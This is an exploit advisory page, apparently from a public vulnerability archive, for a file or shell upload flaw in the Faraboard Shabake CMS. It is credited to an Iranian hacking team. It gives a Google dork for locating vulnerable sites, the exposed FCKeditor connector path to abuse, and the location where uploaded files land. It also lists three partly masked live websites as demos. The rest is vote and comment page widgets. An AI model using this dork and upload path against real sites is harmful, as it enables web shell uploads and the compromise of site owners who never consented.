faraboard shabake cms vulnerability

2014.11.10

Credit: Iranian_Dark_Coders_Team

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: intext:\"طراحی و اجرا فرابرد شبکه\"

#######################################################
# [+] Exploit Title:Vulnerability cms faraboard shabake
# [+] Google Dork:intext:"&#1591;&#1585;&#1575;&#1581;&#1740; &#1608; &#1575;&#1580;&#1585;&#1575; &#1601;&#1585;&#1575;&#1576;&#1585;&#1583; &#1588;&#1576;&#1705;&#1607;"
# [+] Date: 11-10-2014
# [+] Exploit Author: Iranian_Dark_Coders_Team
# [+] Home : http://www.idc-team.net/
# [+] Discovered By : am22
# [+] Category: webapps
# [+] Tested on: Windows 7
# Risk : high
# Operation : file or shell upload
# Cms Home :http://www.farabord.com
Exploit :http://site.com/fckeditor/editor/filemanager/browser/default/connectors/test.html
then see file from this link
http://site.com/files/filebox/File/fileUpload.Html
Demo :
http://wwXXehclinic.com/fckeditor/editor/filemanager/browser/default/connectors/test.html
http://natXXfahansport.ir/fckeditor/editor/filemanager/browser/default/connectors/test.html
http://wwXXXco.ir/fckeditor/editor/filemanager/browser/default/connectors/test.html
Discovered By : Am22
Sp Tnx :
M.R.S.CO,n30,Black.Hack3r,and all member idc-team.net

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

faraboard shabake cms vulnerability

Dork: intext:\"&#1591;&#1585;&#1575;&#1581;&#1740; &#1608; &#1575;&#1580;&#1585;&#1575; &#1601;&#1585;&#1575;&#1576;&#1585;&#1583; &#1588;&#1576;&#1705;&#1607;\"

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Dork: intext:\"طراحی و اجرا فرابرد شبکه\"

Thanks for you comment!
Your message is in quarantine 48 hours.